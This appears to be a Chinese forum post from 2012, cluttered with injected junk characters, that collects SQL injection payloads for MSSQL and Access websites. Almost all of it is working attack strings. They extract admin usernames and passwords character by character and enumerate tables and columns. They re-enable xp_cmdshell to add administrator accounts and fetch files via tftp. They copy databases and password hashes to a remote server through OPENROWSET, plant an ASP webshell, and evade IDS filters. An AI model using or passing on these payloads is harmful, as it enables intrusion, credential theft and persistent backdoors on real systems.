1..判断有无注入点
, ^( T, C6 S3 w# ~; and 1=1 and 1=2 6 }# H: y+ O& ]& r y$ m9 n1 H
/ T- { F+ _5 ^5 o% Q3 e; |$ c
7 A2 P" F. y5 L7 E! O! w2.猜表一般的表的名称无非是admin adminuser user pass password 等.. ( t$ |. n/ ~6 d; C2 g6 ?8 n
and 0<>(select count(*) from *) ( l( F. |7 {3 _$ ]- T/ T
and 0<>(select count(*) from admin) ---判断是否存在admin这张表 + q2 h, S+ {8 ^3 D# A, q- ^
7 x& ?7 s3 p8 U7 K; ]% `* \4 x% j# V3 i+ D7 Y! V: m
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
5 S; r# ]* T! _% R: Mand 0<(select count(*) from admin)
. ?1 P* p* X( o/ P* X5 K+ `and 1<(select count(*) from admin) 1 G) e3 _# g: N# e5 d+ Q# s
猜列名还有 and (select count(列名) from 表名)>06 R7 H( ~5 Z9 z, m
2 e" T) o- c' S* t- P a e
' B& f# L# `9 `4 g6 z- o4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
" ]7 y( L, H. s' H2 Xand 1=(select count(*) from admin where len(*)>0)--
' d8 J! b) K; c1 Y; [" fand 1=(select count(*) from admin where len(用户字段名称name)>0) - n) }, s, Q& H/ |3 e
and 1=(select count(*) from admin where len(密码字段名称password)>0)
5 u9 H p9 I+ ^, A' l: c7 z5 u0 E5 _) j e# t. F
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
- p! S5 d0 G% o( Z8 K6 G# T9 I* Jand 1=(select count(*) from admin where len(*)>0) 1 l/ s0 J! i# V; n. X5 P3 s
and 1=(select count(*) from admin where len(name)>6) 错误
4 C8 j5 E5 A: X1 l# land 1=(select count(*) from admin where len(name)>5) 正确 长度是6 . q5 Y1 i7 e, m! \/ ?8 i# u
and 1=(select count(*) from admin where len(name)=6) 正确
; u% W' F. ?! _$ W/ H) R
4 B) i" H' j% ]and 1=(select count(*) from admin where len(password)>11) 正确 3 I+ i$ _3 V$ E# m" T. F
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 % {' N! [0 z) F/ T
and 1=(select count(*) from admin where len(password)=12) 正确
& }3 m! u* a& S) g8 _2 x: W猜长度还有 and (select top 1 len(username) from admin)>5
2 y) ^. Z$ s5 o8 X: N9 O4 ^- \' S- [& C, h: U" H
. L0 `; q2 _; c/ x, M" [
6.猜解字符 $ S! h- D: S# g& |$ N) x w! C4 t
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位 ) P; T1 a7 F" ?" e1 x
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
4 U9 x# @9 y8 U/ B7 r+ ~- Y就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
( M6 o. s4 U7 `- U$ b+ m" N$ d/ Q6 S. u9 f; I
猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算
* G( v9 j& \. D Q) K' Fand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
) w4 z% W) K% s; j' x3 p这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
' k! x- ^. [7 L. O, ?
$ A7 r" R3 N; V+ I/ H8 {, H+ Q; q6 ?% Cgroup by users.id having 1=1--
5 r8 o$ k4 R% G7 | G7 E$ j$ vgroup by users.id, users.username, users.password, users.privs having 1=1-- & ^5 Q4 |+ e) l7 A$ @* k
; insert into users values( 666, attacker, foobar, 0xffff )-- % U8 z& u- h& K4 T2 W% i- G5 d
" V2 w. a& H( vUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- 9 V" G9 R' @3 N5 }& z
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
0 D0 f% g6 i+ f, V9 cUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- 2 B9 {3 b4 i( R4 N# D8 C
UNION SELECT TOP 1 login_name FROM logintable- . A+ O( C9 b8 Y" b
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul-- + P( g2 |/ p, h5 Z0 w! o U9 \: B$ z7 y
4 }9 r% a6 V3 F5 ]$ \% E! b看服务器打的补丁=出错了打了SP4补丁
4 \4 `8 s3 y" g2 x$ [4 i/ ~$ n- Jand 1=(select @@VERSION)--
& d' K( X5 ], _% A J) w$ W" Z3 W U1 _
看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。
% b1 J4 U ?) U/ s0 Iand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- ; c# D8 G+ Q; M; } v
9 U5 a& r$ f# C( P8 u3 D) s4 z2 S
判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
X f8 h' P) v; C& \' a& b% Pand sa=(SELECT System_user)--
k( C. E: m, F$ U7 J |4 gand user_name()=dbo-- 2 f# O0 s. f) I0 u- s
and 0<>(select user_name()-- 5 f( U- ?) k) [0 ]
! ?1 e& G! [, h* o" c) {
看xp_cmdshell是否删除
& _/ q8 X# i& k$ S \) uand 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
/ _# h6 O$ C' F& M) ~ }2 J1 J- U+ z+ V+ D5 t x0 ?
xp_cmdshell被删除,恢复,支持绝对路径的恢复 + Z1 g4 F! G _, Y) _' ]
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll-- & W% D) f3 R' G3 `; p o
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- 0 R( \+ {0 I$ U7 M; |
# Y* x+ j W' m; m( V4 i, T% H f
反向PING自己实验
5 U- |5 d6 u3 g) o" T;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
8 `' k# f$ H s8 ]+ [5 e
' [ Y( y t1 h3 }/ }6 W% r加帐号
5 \. D1 ~3 I2 l& `! Q' P* f;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
+ G% S$ \! Q0 A4 Z4 M4 I. I I" H' R) I' O, c! U( z9 b0 L
创建一个虚拟目录E盘: + @' K$ c8 w5 K. t! N
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"-- 6 h' i8 _7 A* `+ u
3 M4 r4 l: }: I2 B* C
访问属性:(配合写入一个webshell) $ G) v/ I8 f6 L
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse # P9 X6 s5 y# K n
2 P4 f w) q/ K
@1 l2 y! w( }3 [# }$ l9 XMSSQL也可以用联合查询* Z; H0 j3 K |! t8 `
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin 8 z9 r; v- j/ O: h8 Q( Y
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用) 5 R6 b% X9 B9 {+ J1 f( N2 f8 ~
4 X# c7 M! J! c+ C" u6 g
( r: T8 r/ v6 m- Q; L5 g/ g爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
2 Z/ B( B; r" Q) P$ O6 j2 W n# s. ]( Q3 A; N
+ P5 S7 ?/ K6 y9 z1 x9 R7 i% `0 i
得到WEB路径 ) U0 x! [* ?+ E! z1 K5 D8 m
;create table [dbo].[swap] ([swappass][char](255));-- & l. {; N" K' t# W9 Q0 q4 a: o
and (select top 1 swappass from swap)=1-- % t' j7 }+ f# c+ Z! C( K: E
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)-- 2 l# S: m. U; K
;use ku1;-- : X @+ y d' n# a0 z w! f* j9 g; h
;create table cmd (str image);-- 建立image类型的表cmd
" A4 m3 A9 y" ?# F7 B; P3 m1 a/ \" l$ s5 n6 s
存在xp_cmdshell的测试过程: 1 l7 ~/ T) O; V
;exec master..xp_cmdshell dir 3 ]8 {+ j" G0 {6 p. r+ @: n: ]/ \$ ~
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
( l% A$ O; Q# n- R5 `+ n, v3 O1 B;exec master.dbo.sp_password null,jiaoniang$,1866574;-- $ L2 Q. ~4 a+ C
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
& z" H* \2 `+ E;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- $ y* [6 o- M0 l2 [- s) ]- A1 a
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- $ r" O) T3 Y$ I2 ^
exec master..xp_servicecontrol start, schedule 启动服务
Z" E9 H5 [& H2 @8 V0 M5 t' b5 `9 ~exec master..xp_servicecontrol start, server : i, L- x z& U. r- e
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add ' \: l2 A# A& V
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; b% p. F- H3 z/ s: r, B) x4 j# E; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 2 O5 M1 |: M/ H. b' s/ j$ J
5 S/ h+ B1 j1 Y/ R
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\ ; T% Y2 J7 d* Z
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
( D! O4 K- h% [% G, `;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
8 U( R2 i( D; ~# P如果被限制则可以。 1 k) P3 i' X: i& _
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
' T5 L( I _( s4 L. G6 l3 t/ h. w3 X$ c
查询构造: 9 j/ E2 y' Q# @( e5 X* |% K
SELECT * FROM news WHERE id=... AND topic=... AND .....
h" ^ o+ @# N- ^! H! _/ Q) Nadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
9 r }# q3 x9 J; K- o* Q) jselect 123;-- ( g; d7 `' f2 ~9 w
;use master;--
8 y9 x# X" i6 f& ?0 X/ m) E:a or name like fff%;-- 显示有一个叫ffff的用户哈。 1 f+ m. l: T+ o2 A9 f4 L
and 1<>(select count(email) from [user]);-- # z* H& }4 k: U! f9 N
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- ! @3 k! D& L# b* {" b
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
. q- O( E, D: f6 G' w; M2 y9 ~2 y;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- " b1 ]/ p9 A- L3 I/ M
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
" J2 U7 V9 w9 z+ Y9 ?0 R q& ^" ]* u;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- / I; r% H. C6 s4 c; _% n
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
" c& |" [3 {! H0 Q7 r上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
) L4 m: L6 F5 O" i+ [通过查看ffff的用户资料可得第一个用表叫ad
! z5 t* w8 A! c" s2 O然后根据表名ad得到这个表的ID 得到第二个表的名字
9 X8 ?) d3 |6 Z8 x5 a
8 I4 ^# p6 C: u u6 F( j- R2 G9 uinsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-- - m; A& D: E" F) M
insert into users values( 667,123,123,0xffff)-- " k" _3 p$ t& J! t# J
insert into users values ( 123, admin--, password, 0xffff)--
# _! L. r% L- R2 p. ?( O;and user>0 Z; b- J/ w% i; y
;and (select count(*) from sysobjects)>0
% W9 S3 W, h3 K" o;and (select count(*) from mysysobjects)>0 //为access数据库 7 ^5 C" g& A7 W! ]2 ^
: h3 F' v u* c; C2 X# w# I8 }
枚举出数据表名
3 i: L& _' U+ @ D( U;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
0 H3 \' A- t5 z: s2 k- I8 X$ h这是将第一个表名更新到aaa的字段处。 2 C% U0 g' c: _) j6 S& e& ^
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 ; p8 h# F7 ^: y( e8 w$ p# _
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);-- 8 V3 z4 K% l. s C0 C+ x: w4 F# Z
然后id=1552 and exists(select * from aaa where aaa>5)
, O/ O9 @1 c; |' i读出第二个表,一个个的读出,直到没有为止。
0 Y+ `3 B3 n& C2 a, ~读字段是这样: - J1 D7 ~& ^; X+ `0 q& \
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
9 g9 d; l- q/ p4 c然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 * Q: A- L: I( k
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
/ Z O. a1 s$ V! |' f- j" v然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
7 Y- m8 ?, B: j$ n
; |* Q8 O1 T. Y[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
6 n0 }8 E* V' d/ F9 `# cupdate 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
, c9 C) E5 F0 X% y通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
5 N8 [ }& b, _7 A
- L+ y3 W5 N8 P$ u[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名]
8 v3 q5 \8 @4 P; Y" yupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] ( g) Y3 c! T# R0 j+ h
* X# q9 @8 ]7 L* Z
绕过IDS的检测[使用变量]
% o6 C. { h* b;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
( N( W4 R. Z" g5 n- |5 j, A, I! B;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
: P% z# l* n* Y
7 s# h' o7 V0 L( W* Y1、 开启远程数据库 0 B% k7 C3 j* Q- a
基本语法
* D% \$ b" ?; g. W& Oselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
" I1 ]7 s& U! E( R+ n- X1 ?参数: (1) OLEDB Provider name
; g) Q7 z8 N. ^ v' q7 \. C5 n5 A2、 其中连接字符串参数可以是任何端口用来连接,比如
5 M2 f5 j5 Q5 b8 w2 |select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
8 {2 X8 u4 e0 L3.复制目标主机的整个数据库insert所有远程表到本地表。 ) H) M+ }& i9 e+ [
7 o1 Q9 z! v0 ]1 j- g, L
基本语法:
3 j" b- {5 H/ B6 _. } n+ Minsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2 " n+ P% a3 f E7 h8 r9 y7 j2 W. W
这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: % H" S) i1 D5 c( _; ~9 b3 _
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
4 @) l- @7 Z( u! n/ r% o5 @$ i; tinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
8 V" R5 W+ S' `1 T9 Aselect * from master.dbo.sysdatabases
1 @: B& Z& b' ]1 L0 m1 P8 Einsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
) I4 B |/ G& `" a pselect * from user_database.dbo.sysobjects
" K, {9 ]/ Y% Z. s% r zinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 6 f$ M- }+ X0 |5 {4 m. w# Z
select * from user_database.dbo.syscolumns ' |- h2 g6 h$ Z& C7 k3 r$ [* O* b
复制数据库:
, y1 B+ [2 S7 K% u6 Sinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
) B) q9 u1 v8 y5 l1 O7 D; V, U4 Kinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 3 p7 x3 ]& _0 C: m* j; n
; \$ \; y( q2 I复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下:
& y1 w4 U5 B5 x& u! G4 H/ _insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
% J) x9 H+ T) _% E6 Q& i4 g得到hash之后,就可以进行暴力破解。
1 k: D8 ]0 u \& g3 ?: m/ Y. }1 i
* [, [: W3 g6 V, G7 g( U5 z/ l9 g遍历目录的方法: 先创建一个临时表:temp 9 `& b/ L& S, N n
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
. e) L% d, C2 U/ {, h;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
" q/ _" n- x$ u' V;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 , ?2 |; q) J3 s7 d( q
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中 ' {8 ?8 E5 x" f
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
) n) ~3 U) v) a O+ T. U;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;-- 3 z( w% T9 X3 F1 Q
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
. M7 H* a( s3 s) u/ B+ Z; [7 r, a;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc . A; H* }5 t5 g& l+ u
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC) 9 h( ?2 w) M& S$ p7 Q6 Z! O
写入表: 8 r( ~8 z! \- m/ ~6 o# k3 c
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
6 Y4 z. T$ X' ?+ x- I0 `+ G t语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
/ p9 A, H6 U2 o1 Y* f# }语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- ) L3 i# C4 j4 l; Z+ ]3 E
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
4 U, Q: k% O; P! s/ l5 c语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
* c+ j+ l. G9 n6 q+ ]/ n6 q语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
! `7 N, L+ x. r* u N0 r( L语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- : x* e6 F" H. W9 \) A
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- ) h1 m, q' W3 Y8 u# ?
语句9:and 1=(SELECT IS_MEMBER(db_owner));--
) ^8 P1 M' `& J5 }! c$ p8 [3 Y+ j: f+ \) D1 b
把路径写到表中去: 6 ~1 Q8 d5 F. W- K" @; c
;create table dirs(paths varchar(100), id int)-- }- m1 X" ]3 p3 n0 ~; r _/ Y; j
;insert dirs exec master.dbo.xp_dirtree c:\--
+ a2 X! D0 w! F& tand 0<>(select top 1 paths from dirs)--
4 m" g0 K" l, Pand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- 0 h. j; H5 R% u$ N
;create table dirs1(paths varchar(100), id int)-- ) ^( v# F* _8 o" C2 `! f' L; h) x; ]
;insert dirs exec master.dbo.xp_dirtree e:\web-- 3 B8 \4 p4 ]" I! r
and 0<>(select top 1 paths from dirs1)--
, b. d7 }8 h0 ~! G, I4 K- O# X) H( P4 n
把数据库备份到网页目录:下载 . o9 v" @" r' \) Y5 ^
;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- 0 J! `3 D, r9 t. b) s/ ], U
9 l- y* Y# P/ a4 b
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
+ o: O6 Z! k1 }& d7 f( Xand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。 ! s* q# O: r: l6 r$ S& v
and 1=(select user_id from USER_LOGIN)
1 M1 ~1 q$ r* W7 x8 sand 0=(select user from USER_LOGIN where user>1)
, z; v, U' }; h f! M1 r M9 ^- t6 x
" l/ T+ B: f% {1 W4 H-=- wscript.shell example -=- 2 y% ?- G0 }: G8 [. ], g
declare @o int
7 o) Q) h& ?' x: l3 m+ v9 iexec sp_oacreate wscript.shell, @o out
; { t O8 T5 i# b% rexec sp_oamethod @o, run, NULL, notepad.exe 9 k# f4 g- l9 _
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
# \ W' c# {( r( \2 w4 p# k4 _/ B2 s( c: g) n
declare @o int, @f int, @t int, @ret int 1 }! _& |! c3 i& g4 N
declare @line varchar(8000)
8 N! z& h. v$ [" L x' D/ Nexec sp_oacreate scripting.filesystemobject, @o out
3 `! G0 o8 B7 w2 n' Kexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
+ @$ x" W: W; y# ^" k. w* Lexec @ret = sp_oamethod @f, readline, @line out
5 j6 |0 h& n+ o, W' n/ fwhile( @ret = 0 ) * m% {8 L U, E2 A4 U0 V9 X9 ~
begin
( q6 Q0 Z: X/ r: zprint @line
1 q/ o# D0 t" d2 M4 u' |exec @ret = sp_oamethod @f, readline, @line out
+ Q( c2 R% G' T/ w, f9 Jend , O; M3 H# S4 ]" d+ N! ]( s: B3 O
L9 G6 J# h0 N( f
declare @o int, @f int, @t int, @ret int
" J. q, ?: f+ lexec sp_oacreate scripting.filesystemobject, @o out # Q. \ N$ q7 d1 J
exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
) @; e; ~ g o- w2 ^: aexec @ret = sp_oamethod @f, writeline, NULL,
E! a# ^! l: ^* q( O<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %> & n V: ~' _8 O6 g, @5 l6 n3 Q. _
9 K5 \- r: G3 p' Vdeclare @o int, @ret int
: I* e! f+ C' _* y" |$ \0 [+ V1 Oexec sp_oacreate speech.voicetext, @o out . s O" O+ _- o* J2 U) A
exec sp_oamethod @o, register, NULL, foo, bar + }2 O" y5 i: j8 L1 v2 f. ^. r7 L
exec sp_oasetproperty @o, speed, 150 & C! m( H" v8 r3 p3 l( O
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 9 p3 ~# }9 b9 T; w; L
waitfor delay 00:00:05 , ~% J: k" J& ~5 j& G( g; `# ]
! W1 s' N. f2 i2 A9 [; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- , B8 r, D; n- T Z( o/ ^4 a
a+ q% e- k% K! l6 K& Gxp_dirtree适用权限PUBLIC
& b) M6 t4 F5 g1 vexec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 * _) ?; D3 E4 g8 c
create table dirs(paths varchar(100), id int)
! H+ m8 Z, V; ~; O& f; k. f5 O建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 T" |! T8 E7 ~ O3 G; G. z' w
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!7 n+ Y2 X$ |! B# h/ ^. _
|
发表于 2012-9-15 14:32:40
收藏
支持
反对